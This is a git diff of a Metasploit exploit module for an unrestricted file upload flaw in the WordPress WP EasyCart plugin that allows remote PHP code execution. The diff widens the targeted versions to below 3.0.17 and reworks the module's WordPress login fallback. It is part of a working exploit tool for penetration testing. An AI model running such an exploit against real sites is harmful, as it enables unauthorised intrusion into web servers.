diff --git a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb index 3a19dd6c9c..8dee9128fa 100644 --- a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb @@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info( info, - 'Name' => 'WordPress WP EasyCart 3.0.4 Unrestricted File Upload', + 'Name' => 'WordPress WP EasyCart Unrestricted File Upload', 'Description' => %q{WordPress Shopping Cart (WP EasyCart) Plugin for WordPress contains a flaw that allows a remote attacker to execute arbitrary PHP code. This @@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Jan 08 2015', 'Platform' => 'php', 'Arch' => ARCH_PHP, - 'Targets' => [['wp-easycart < 3.0.16', {}]], + 'Targets' => [['wp-easycart < 3.0.17', {}]], 'DefaultTarget' => 0 )) @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote end def check - check_plugin_version_from_readme('wp-easycart', '3.0.16') + check_plugin_version_from_readme('wp-easycart', '3.0.17') end def generate_mime_message(payload, date_hash, name, include_req_id) @@ -126,13 +126,15 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Authenticating using #{username}:#{password}...") cookie = wordpress_login(username, password) - if use_ec_authentication - print_warning("#{peer} - Failed to authenticate with WordPress, attempting upload with EC password next...") if cookie.nil? + if !cookie + if use_ec_authentication + print_warning("#{peer} - Failed to authenticate with WordPress, attempting upload with EC password next...") + else + fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') + end else - fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil? + print_good("#{peer} - Authenticated with WordPress") end - - print_good("#{peer} - Authenticated with WordPress") unless cookie.nil? end print_status("#{peer} - Preparing payload...")